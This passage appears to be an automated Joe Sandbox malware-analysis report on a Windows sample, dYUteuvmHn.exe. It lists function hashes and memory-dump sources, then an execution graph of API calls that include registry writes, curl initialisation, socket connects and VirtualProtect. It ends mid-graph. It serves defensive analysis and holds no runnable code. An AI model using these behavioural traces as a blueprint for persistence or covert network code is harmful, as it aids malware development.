                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                • Opcode ID: dbab30d8a6d21c764778c733185e7f0760ddcf84baf50d27d584208956b53964
                                                                                                                                • Instruction ID: d1b6597b0269069bfebda9df0ac0b3dd2ba62335c35dfe7c32f55ab66b50f27f
                                                                                                                                • Opcode Fuzzy Hash: dbab30d8a6d21c764778c733185e7f0760ddcf84baf50d27d584208956b53964
                                                                                                                                • Instruction Fuzzy Hash: 62D11232B08A4189E712DF75D4412AD77B1FB5ABA8F804226CF5D97B89DE78E00EC750
                                                                                                                                Function 00007FF7127614D0 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy_invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3942279934-0
                                                                                                                                • Opcode ID: ebd5d0b6ffc0fbe65e675c7e949a9b0ddd48fe8675a33c498a116e3d73883f0c
                                                                                                                                • Instruction ID: 8c58f65d1cc7824f18c169b82e02e8e5f64c030113eaa630901c46e2cafc43b0
                                                                                                                                • Opcode Fuzzy Hash: ebd5d0b6ffc0fbe65e675c7e949a9b0ddd48fe8675a33c498a116e3d73883f0c
                                                                                                                                • Instruction Fuzzy Hash: BC51A622A09F8645FA10AB15F44537AA351EB4A7B4F944231EB9D06B96EF7CE08DC710
                                                                                                                                Function 00007FF71277780C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __except_validate_context_record
                                                                                                                                • String ID: csm$csm
                                                                                                                                • API String ID: 1467352782-3733052814
                                                                                                                                • Opcode ID: 8e112c9cc8b57a005fe7f9316bfc4ed2e968ad98c87934438d9f9115b34ab283
                                                                                                                                • Instruction ID: 7ce5a04df4cab1717056fcd8b43d126acfea28f454aa2ef222d98fd1995a88b5
                                                                                                                                • Opcode Fuzzy Hash: 8e112c9cc8b57a005fe7f9316bfc4ed2e968ad98c87934438d9f9115b34ab283
                                                                                                                                • Instruction Fuzzy Hash: 2971F432509A8286EB64BF15D44877EFBA0EB0ABA4F848135DF8C07685CF6CD558CB50
                                                                                                                                Function 00007FF712777EA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                • String ID: csm
                                                                                                                                • API String ID: 2558813199-1018135373
                                                                                                                                • Opcode ID: 4a13f81d0c027ac9a82ce784f581a5edc0b391854fe52833230df926a24ae562
                                                                                                                                • Instruction ID: d751a9c622c437ab9cc11ec977e4f72b4b0330399e2fefbad66bf209792ad785
                                                                                                                                • Opcode Fuzzy Hash: 4a13f81d0c027ac9a82ce784f581a5edc0b391854fe52833230df926a24ae562
                                                                                                                                • Instruction Fuzzy Hash: 9E513E32619B8186E620FB15E44426FB7A4FB8ABB0F540135EF8D0BB55CF78E469CB11
                                                                                                                                Function 00007FF71277C828 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                • String ID: C:\Users\user\Desktop\dYUteuvmHn.exe
                                                                                                                                • API String ID: 3307058713-1347455493
                                                                                                                                • Opcode ID: c2ebe96ac8faf4276af3ce06e6d9ff64cda5e4469a403ac2682072991903c64b
                                                                                                                                • Instruction ID: 5d6b7568c1adb63f38d88639c40414b32460e791b7a2149617f308f4dcde6b9c
                                                                                                                                • Opcode Fuzzy Hash: c2ebe96ac8faf4276af3ce06e6d9ff64cda5e4469a403ac2682072991903c64b
                                                                                                                                • Instruction Fuzzy Hash: 54419136A08F0285EB54BF21A8450BAB394EB4EBF4B944035EB4D47B45DE7CE49DC720
                                                                                                                                Function 00007FF712780C10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                • String ID: U
                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                • Opcode ID: 63b75e8a8e85f5ae143d55bde05ee26fc9721e6168c3b8222b6e4c0b22b80d3a
                                                                                                                                • Instruction ID: c93db48959759de49d9aa966ebfd08512d87d38075cdba8335af11d88d5f89b1
                                                                                                                                • Opcode Fuzzy Hash: 63b75e8a8e85f5ae143d55bde05ee26fc9721e6168c3b8222b6e4c0b22b80d3a
                                                                                                                                • Instruction Fuzzy Hash: 1D41E472A19E8186D711AF25E4053AAB7A0FB897A4F804031EF4D87758EFBCD40DC760
                                                                                                                                Function 00007FF7127755D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF71276118F), ref: 00007FF712775620
                                                                                                                                • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF71276118F), ref: 00007FF712775661
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                • String ID: csm
                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                • Opcode ID: 7c0ec16579065a6e2efc5c2d2e86b05edcbea124611f0f2d2bb5e1406ba378fe
                                                                                                                                • Instruction ID: 43b5191eb4ffa9e0a249ef29c89a1c71e927fe9a5623954a5c9fa26211422729
                                                                                                                                • Opcode Fuzzy Hash: 7c0ec16579065a6e2efc5c2d2e86b05edcbea124611f0f2d2bb5e1406ba378fe
                                                                                                                                • Instruction Fuzzy Hash: 82115E32608F8082EB219B15F40426AB7E0FB89BA4F984634EF8C47758DF7CC559C700

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:3.8%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:9.2%
                                                                                                                                Total number of Nodes:2000
                                                                                                                                Total number of Limit Nodes:65
                                                                                                                                execution_graph 92557 7ff8a9318e40 AcquireSRWLockExclusive 92558 7ff8a9318e85 ReleaseSRWLockExclusive 92557->92558 92559 7ff8a9318e5b 92557->92559 92559->92558 92564 7ff8a9364d70 92559->92564 92561 7ff8a9318e6b 92568 7ff8a934fde0 92561->92568 92565 7ff8a9364d7d 92564->92565 92566 7ff8a9364d87 92564->92566 92575 7ff8a9314810 92565->92575 92566->92561 92569 7ff8a934fe0a 92568->92569 92570 7ff8a934fdf4 FreeLibrary 92568->92570 92571 7ff8a9314810 FreeLibrary 92569->92571 92570->92569 92572 7ff8a934fe0f 92571->92572 92573 7ff8a934fe14 WSACleanup 92572->92573 92574 7ff8a9318e7b 92572->92574 92573->92574 92574->92558 92576 7ff8a9314820 FreeLibrary 92575->92576 92577 7ff8a9314836 92575->92577 92576->92577 92577->92566 92578 7ff8a933fec0 memset 92579 7ff8a933feed 92578->92579 92580 7ff6cabe3d7c 92601 7ff6cabe4288 92580->92601 92583 7ff6cabe3ec8 92662 7ff6cabe491c 7 API calls 2 library calls 92583->92662 92584 7ff6cabe3d98 __scrt_acquire_startup_lock 92586 7ff6cabe3ed2 92584->92586 92592 7ff6cabe3db6 __scrt_release_startup_lock 92584->92592 92663 7ff6cabe491c 7 API calls 2 library calls 92586->92663 92588 7ff6cabe3ddb 92589 7ff6cabe3edd BuildCatchObjectHelperInternal 92590 7ff6cabe3e61 92607 7ff6cabe4a64 92590->92607 92592->92588 92592->92590 92659 7ff6cabf3738 69 API calls __GSHandlerCheck_EH 92592->92659 92593 7ff6cabe3e66 92610 7ff6cabd9950 92593->92610 92602 7ff6cabe4290 92601->92602 92603 7ff6cabe429c __scrt_dllmain_crt_thread_attach 92602->92603 92604 7ff6cabe3d90 92603->92604 92605 7ff6cabe42a9 92603->92605 92604->92583 92604->92584 92605->92604 92664 7ff6cabe5e80 7 API calls 2 library calls 92605->92664 92665 7ff6cac06460 92607->92665 92609 7ff6cabe4a7b GetStartupInfoW 92609->92593 92667 7ff6cabdaa00 92610->92667 92612 7ff6cabd99a7 92672 7ff6cabd8d30 92612->92672 92615 7ff6cabd99ec RegSetValueExW RegCloseKey 92616 7ff6cabd9a36 numpunct 92615->92616 92618 7ff6cabd9a93 92616->92618 92619 7ff6cabd9a81 curl_global_init 92616->92619 92651 7ff6cabd9fc9 92616->92651 92688 7ff6cabda440 92618->92688 92619->92618 92621 7ff6cabf1878 _invalid_parameter_noinfo_noreturn 69 API calls 92623 7ff6cabd9fcf 92621->92623 92627 7ff6cabf1878 _invalid_parameter_noinfo_noreturn 69 API calls 92623->92627 92629 7ff6cabd9fd5 92627->92629 92632 7ff6cabf1878 _invalid_parameter_noinfo_noreturn 69 API calls 92629->92632 92651->92621 92659->92590 92662->92586 92663->92589 92664->92604 92666 7ff6cac06450 92665->92666 92666->92609 92666->92666 92668 7ff6cabdab27 92667->92668 92671 7ff6cabdaa26 ctype 92667->92671 92858 7ff6cabb1280 71 API calls 92668->92858 92671->92612 92673 7ff6cac06460 __scrt_get_show_window_mode 92672->92673 92674 7ff6cabd8d7d GetModuleHandleExW 92673->92674 92675 7ff6cabd8d9d 92674->92675 92676 7ff6cabd8db8 GetModuleFileNameW 92674->92676 92678 7ff6cabe3b30 _Strcoll 8 API calls 92675->92678 92676->92675 92677 7ff6cabd8dd1 92676->92677 92680 7ff6cabdaa00 71 API calls 92677->92680 92679 7ff6cabd8f84 RegOpenKeyExW 92678->92679 92679->92615 92679->92616 92681 7ff6cabd8e06 92680->92681 92681->92675 92682 7ff6cabd8f6d numpunct 92681->92682 92683 7ff6cabd920e 92681->92683 92682->92675 92684 7ff6cabf1878 _invalid_parameter_noinfo_noreturn 69 API calls 92683->92684 92685 7ff6cabd9213 92684->92685 92686 7ff6cabf1878 _invalid_parameter_noinfo_noreturn 69 API calls 92685->92686 92687 7ff6cabd9219 92686->92687 92689 7ff6cabda492 92688->92689 92690 7ff6cabda485 92688->92690 92859 7ff6cabd89b0 92689->92859 92875 7ff6cabdad30 71 API calls 6 library calls 92690->92875 92862 7ff6cabd89f5 92859->92862 92870 7ff6cabd89eb numpunct 92859->92870 92860 7ff6cabe3b30 _Strcoll 8 API calls 92862->92870 92888 7ff6cabd8240 71 API calls 6 library calls 92862->92888 92870->92860 92875->92689 93354 7ff6cabf8410 VirtualProtect 93355 7ff8a9305ea0 93356 7ff8a9305ede 93355->93356 93357 7ff8a9305ee3 93355->93357 93356->93357 93358 7ff8a9306062 93356->93358 93395 7ff8a93079f0 93356->93395 93526 7ff8a9369e10 93357->93526 93476 7ff8a9342690 93358->93476 93365 7ff8a9306081 93368 7ff8a9314bb0 14 API calls 93365->93368 93366 7ff8a9306098 93370 7ff8a93060d0 93366->93370 93372 7ff8a93060aa 93366->93372 93367 7ff8a9305fa9 93367->93357 93369 7ff8a930602d 93367->93369 93371 7ff8a9307f90 34 API calls 93367->93371 93368->93357 93369->93357 93517 7ff8a9308110 93369->93517 93486 7ff8a93082d0 SleepEx getsockopt 93370->93486 93376 7ff8a9305fc7 WSASetLastError 93371->93376 93372->93367 93381 7ff8a93082d0 3 API calls 93372->93381 93373 7ff8a9305f36 connect 93374 7ff8a9305f4e WSAGetLastError 93373->93374 93459 7ff8a9307f90 93374->93459 93512 7ff8a934ec40 21 API calls 93376->93512 93381->93367 93383 7ff8a93060eb 93489 7ff8a9353b60 93383->93489 93384 7ff8a9305ff5 93513 7ff8a9314b60 93384->93513 93389 7ff8a93060f5 93391 7ff8a9307f90 34 API calls 93389->93391 93390 7ff8a9305f97 93511 7ff8a93081a0 31 API calls 93390->93511 93392 7ff8a930610a 93391->93392 93394 7ff8a9314bb0 14 API calls 93392->93394 93394->93357 93396 7ff8a9353b60 2 API calls 93395->93396 93397 7ff8a9307a2e 93396->93397 93535 7ff8a9308230 93397->93535 93399 7ff8a9307a4f 93452 7ff8a9307ac1 93399->93452 93538 7ff8a930c990 93399->93538 93401 7ff8a9308110 2 API calls 93458 7ff8a9307ae1 93401->93458 93402 7ff8a9314bb0 14 API calls 93404 7ff8a9307b05 93402->93404 93403 7ff8a9307a73 93405 7ff8a9307b2e 93403->93405 93406 7ff8a9307a7b _errno _errno _errno 93403->93406 93407 7ff8a9369e10 8 API calls 93404->93407 93408 7ff8a9307b37 setsockopt 93405->93408 93409 7ff8a9307b65 93405->93409 93547 7ff8a934ec40 21 API calls 93406->93547 93411 7ff8a9305f04 93407->93411 93408->93409 93413 7ff8a9314b60 18 API calls 93409->93413 93411->93357 93411->93367 93411->93373 93411->93374 93412 7ff8a9307aac 93548 7ff8a9314a70 14 API calls 93412->93548 93415 7ff8a9307b82 93413->93415 93416 7ff8a9307bf9 93415->93416 93417 7ff8a9307ba2 setsockopt 93415->93417 93426 7ff8a9307c40 93416->93426 93550 7ff8a935c700 93416->93550 93417->93416 93418 7ff8a9307bcf WSAGetLastError 93417->93418 93549 7ff8a934ec40 21 API calls 93418->93549 93419 7ff8a9307c44 93427 7ff8a9307cc9 setsockopt 93419->93427 93431 7ff8a9307df8 93419->93431 93420 7ff8a9307c61 getsockopt 93423 7ff8a9307c92 setsockopt 93420->93423 93424 7ff8a9307c88 93420->93424 93423->93419 93424->93419 93424->93423 93425 7ff8a9307be7 93428 7ff8a9314b60 18 API calls 93425->93428 93426->93419 93426->93420 93429 7ff8a9307d0b 93427->93429 93430 7ff8a9307cf9 WSAGetLastError 93427->93430 93428->93416 93435 7ff8a9307d16 setsockopt 93429->93435 93432 7ff8a9307dea 93430->93432 93433 7ff8a9307e8d 93431->93433 93436 7ff8a9307e54 93431->93436 93431->93452 93434 7ff8a9314b60 18 API calls 93432->93434 93546 7ff8a933c2d0 ioctlsocket 93433->93546 93434->93431 93437 7ff8a9307d3f WSAGetLastError 93435->93437 93438 7ff8a9307d5a 93435->93438 93569 7ff8a9307410 555 API calls 93436->93569 93441 7ff8a9314b60 18 API calls 93437->93441 93444 7ff8a9307d65 setsockopt 93438->93444 93441->93438 93442 7ff8a9307e9a 93445 7ff8a9307eb5 93442->93445 93446 7ff8a9307e9e WSAGetLastError 93442->93446 93443 7ff8a9307e74 93443->93433 93448 7ff8a9307e7a 93443->93448 93449 7ff8a9307d8e WSAGetLastError 93444->93449 93450 7ff8a9307da9 93444->93450 93447 7ff8a9307ecc 93445->93447 93445->93452 93446->93452 93453 7ff8a9307f90 34 API calls 93447->93453 93447->93458 93448->93452 93451 7ff8a9314b60 18 API calls 93449->93451 93454 7ff8a9307db4 setsockopt 93450->93454 93451->93450 93452->93401 93452->93458 93455 7ff8a9307ee0 93453->93455 93454->93431 93456 7ff8a9307ddd WSAGetLastError 93454->93456 93457 7ff8a9353b60 2 API calls 93455->93457 93456->93432 93457->93458 93458->93402 93460 7ff8a9307fc7 93459->93460 93472 7ff8a9308067 93459->93472 93461 7ff8a9307fe2 getsockname 93460->93461 93460->93472 93463 7ff8a9308035 WSAGetLastError 93461->93463 93464 7ff8a930806e 93461->93464 93462 7ff8a9369e10 8 API calls 93465 7ff8a9305f62 93462->93465 93574 7ff8a934ec40 21 API calls 93463->93574 93467 7ff8a930c990 11 API calls 93464->93467 93492 7ff8a9314bb0 93465->93492 93469 7ff8a930808a 93467->93469 93468 7ff8a9308052 93575 7ff8a9314a70 14 API calls 93468->93575 93471 7ff8a930808e _errno _errno 93469->93471 93469->93472 93576 7ff8a934ec40 21 API calls 93471->93576 93472->93462 93474 7ff8a93080bc 93577 7ff8a9314a70 14 API calls 93474->93577 93477 7ff8a93426bd 93476->93477 93480 7ff8a93426d4 93476->93480 93478 7ff8a93426c7 93477->93478 93477->93480 93602 7ff8a93427f0 WSASetLastError Sleep 93478->93602 93578 7ff8a9342110 93480->93578 93481 7ff8a93426cf 93483 7ff8a9342736 93481->93483 93484 7ff8a9369e10 8 API calls 93483->93484 93485 7ff8a930607b 93484->93485 93485->93365 93485->93366 93487 7ff8a9308321 WSAGetLastError 93486->93487 93488 7ff8a93060e3 93486->93488 93487->93488 93488->93367 93488->93383 93490 7ff8a9353bad GetTickCount 93489->93490 93491 7ff8a9353b72 QueryPerformanceCounter 93489->93491 93490->93389 93491->93389 93493 7ff8a9314bb9 93492->93493 93496 7ff8a9305f85 93492->93496 93494 7ff8a9314cf3 93493->93494 93497 7ff8a9314c50 93493->93497 93498 7ff8a9334eb0 8 API calls 93493->93498 93495 7ff8a9369e10 8 API calls 93494->93495 93495->93496 93496->93358 93496->93390 93499 7ff8a9314c71 93497->93499 93500 7ff8a9314c83 93497->93500 93498->93497 93501 7ff8a9334eb0 8 API calls 93499->93501 93502 7ff8a9334eb0 8 API calls 93500->93502 93503 7ff8a9314c81 93501->93503 93502->93503 93603 7ff8a9335060 8 API calls 93503->93603 93505 7ff8a9314cb7 93506 7ff8a9314d0d 93505->93506 93507 7ff8a9314cde 93505->93507 93605 7ff8a9369f38 8 API calls 93506->93605 93604 7ff8a9314980 fwrite fwrite 93507->93604 93510 7ff8a9314d12 93511->93367 93512->93384 93514 7ff8a9314ba0 93513->93514 93515 7ff8a9314b65 93513->93515 93514->93369 93515->93514 93606 7ff8a9314eb0 18 API calls 93515->93606 93518 7ff8a930818a 93517->93518 93519 7ff8a930812e 93517->93519 93518->93357 93520 7ff8a9308181 closesocket 93519->93520 93521 7ff8a9308179 93519->93521 93523 7ff8a930813f 93519->93523 93520->93518 93608 7ff8a93378b0 free 93521->93608 93607 7ff8a93378b0 free 93523->93607 93525 7ff8a9308147 93525->93357 93527 7ff8a9369e19 93526->93527 93528 7ff8a930613c 93527->93528 93529 7ff8a9369e64 IsProcessorFeaturePresent 93527->93529 93530 7ff8a9369e7c 93529->93530 93609 7ff8a936a05c RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 93530->93609 93532 7ff8a9369e8f 93610 7ff8a9369e30 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 93532->93610 93536 7ff8a930827a socket 93535->93536 93537 7ff8a9308252 93535->93537 93536->93537 93537->93399 93540 7ff8a930ca22 93538->93540 93541 7ff8a930c9b4 93538->93541 93539 7ff8a930ca3f 93539->93403 93540->93539 93570 7ff8a9334eb0 93540->93570 93543 7ff8a930c9fb _errno 93541->93543 93544 7ff8a930c9c4 inet_ntop 93541->93544 93543->93403 93544->93543 93545 7ff8a930c9d4 htons 93544->93545 93545->93403 93546->93442 93547->93412 93548->93452 93549->93425 93551 7ff8a935c73f GetModuleHandleA GetProcAddress 93550->93551 93553 7ff8a935c76a 93550->93553 93551->93553 93552 7ff8a935c7c3 memset 93554 7ff8a935c7f6 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask 93552->93554 93553->93552 93558 7ff8a935c79b 93553->93558 93556 7ff8a935c868 93554->93556 93557 7ff8a935c851 VerSetConditionMask 93554->93557 93559 7ff8a935c87f RtlVerifyVersionInfo 93556->93559 93560 7ff8a935c88a VerifyVersionInfoW 93556->93560 93557->93556 93561 7ff8a9369e10 8 API calls 93558->93561 93564 7ff8a935c896 93559->93564 93560->93564 93562 7ff8a935c931 93561->93562 93562->93426 93563 7ff8a935c8cc VerSetConditionMask 93565 7ff8a935c8f6 RtlVerifyVersionInfo 93563->93565 93566 7ff8a935c901 VerifyVersionInfoW 93563->93566 93564->93558 93564->93563 93567 7ff8a935c700 8 API calls 93564->93567 93565->93558 93566->93558 93568 7ff8a935c8c8 93567->93568 93568->93558 93568->93563 93569->93443 93573 7ff8a93350f0 8 API calls 93570->93573 93572 7ff8a9334ee3 93572->93539 93573->93572 93574->93468 93575->93472 93576->93474 93577->93472 93579 7ff8a934214a 93578->93579 93580 7ff8a9342164 93578->93580 93579->93580 93592 7ff8a934218d 93579->93592 93581 7ff8a93424c5 93580->93581 93582 7ff8a93424ae Sleep 93580->93582 93583 7ff8a9342173 WSASetLastError 93580->93583 93582->93581 93584 7ff8a934231f 93583->93584 93585 7ff8a9369e10 8 API calls 93584->93585 93586 7ff8a9342340 93585->93586 93586->93483 93587 7ff8a93422f8 93589 7ff8a934237c 93587->93589 93591 7ff8a9342307 93587->93591 93588 7ff8a9342314 WSASetLastError 93588->93584 93590 7ff8a9342389 select 93589->93590 93593 7ff8a934230c 93590->93593 93591->93593 93595 7ff8a9342353 WSASetLastError 93591->93595 93596 7ff8a9342360 Sleep 93591->93596 93592->93587 93592->93588 93594 7ff8a93423d0 93593->93594 93601 7ff8a93423ed 93593->93601 93594->93584 93597 7ff8a93423d9 WSAGetLastError 93594->93597 93595->93593 93596->93593 93597->93584 93598 7ff8a93424a7 93598->93582 93599 7ff8a9342447 __WSAFDIsSet 93600 7ff8a9342465 __WSAFDIsSet 93599->93600 93599->93601 93600->93601 93601->93598 93601->93599 93601->93600 93602->93481 93603->93505 93604->93494 93605->93510 93606->93514 93607->93525 93608->93520 93609->93532 93611 7ff8a93064a0 recv 93612 7ff8a9306576 93611->93612 93613 7ff8a9306504 WSAGetLastError 93611->93613 93614 7ff8a9314bb0 14 API calls 93612->93614 93615 7ff8a930653e 93613->93615 93623 7ff8a9306513 93613->93623 93619 7ff8a9306596 93614->93619 93626 7ff8a934ec40 21 API calls 93615->93626 93617 7ff8a9306550 93627 7ff8a9314a70 14 API calls 93617->93627 93618 7ff8a9306539 93622 7ff8a9369e10 8 API calls 93618->93622 93619->93618 93624 7ff8a9353b60 2 API calls 93619->93624 93620 7ff8a9314bb0 14 API calls 93620->93618 93625 7ff8a93065d2 93622->93625 93623->93620 93624->93618 93626->93617 93627->93623 93628 7ff8a9308cd0 93629 7ff8a9308d0e 93628->93629 93633 7ff8a9308d1b 93628->93633 93630 7ff8a9308dd5 93631 7ff8a9308e7b 93630->93631 93634 7ff8a9308de0 93630->93634 93683 7ff8a9309a80 8 API calls 93631->93683 93633->93629 93643 7ff8a9304e50 93633->93643 93634->93629 93635 7ff8a9308e46 93634->93635 93676 7ff8a93065f0 93634->93676 93681 7ff8a9309a80 8 API calls 93635->93681 93637 7ff8a9308e52 93638 7ff8a9353b60 2 API calls 93637->93638 93639 7ff8a9308e5c 93638->93639 93682 7ff8a9356810 18 API calls 93639->93682 93644 7ff8a9304e81 93643->93644 93645 7ff8a9304e70 93643->93645 93646 7ff8a9353b60 2 API calls 93644->93646 93645->93630 93647 7ff8a9304e93 93646->93647 93649 7ff8a9314bb0 14 API calls 93647->93649 93659 7ff8a9304e9c 93647->93659 93648 7ff8a9304ea5 93653 7ff8a9314bb0 14 API calls 93648->93653 93650 7ff8a9304ee2 93649->93650 93651 7ff8a9304eec 93650->93651 93652 7ff8a9304f29 93650->93652 93684 7ff8a9305aa0 7 API calls 93651->93684 93652->93659 93686 7ff8a9305aa0 7 API calls 93652->93686 93656 7ff8a930519c 93653->93656 93655 7ff8a9305028 93688 7ff8a9305aa0 7 API calls 93655->93688 93656->93630 93657 7ff8a9305124 93657->93648 93665 7ff8a9314bb0 14 API calls 93657->93665 93659->93648 93666 7ff8a9304f91 93659->93666 93670 7ff8a9304fa7 93659->93670 93660 7ff8a9304f0a 93660->93659 93685 7ff8a93374f0 20 API calls 93660->93685 93663 7ff8a9314bb0 14 API calls 93669 7ff8a930508b 93663->93669 93664 7ff8a930504d 93664->93657 93664->93663 93665->93648 93687 7ff8a93057c0 17 API calls 93666->93687 93668 7ff8a9305016 93672 7ff8a9314bb0 14 API calls 93668->93672 93669->93657 93671 7ff8a93050aa 93669->93671 93670->93655 93670->93664 93670->93668 93673 7ff8a9305107 93670->93673 93689 7ff8a93057c0 17 API calls 93671->93689 93672->93655 93690 7ff8a93374f0 20 API calls 93673->93690 93677 7ff8a930660a 93676->93677 93678 7ff8a9306613 93676->93678 93677->93678 93679 7ff8a9307f90 34 API calls 93677->93679 93678->93634 93680 7ff8a9306664 93679->93680 93680->93634 93681->93637 93682->93629 93683->93629 93684->93660 93685->93659 93686->93659 93687->93648 93688->93664 93689->93648 93690->93664 93691 7ff8a930aa90 93692 7ff8a930aad4 93691->93692 93694 7ff8a930aae9 93692->93694 93695 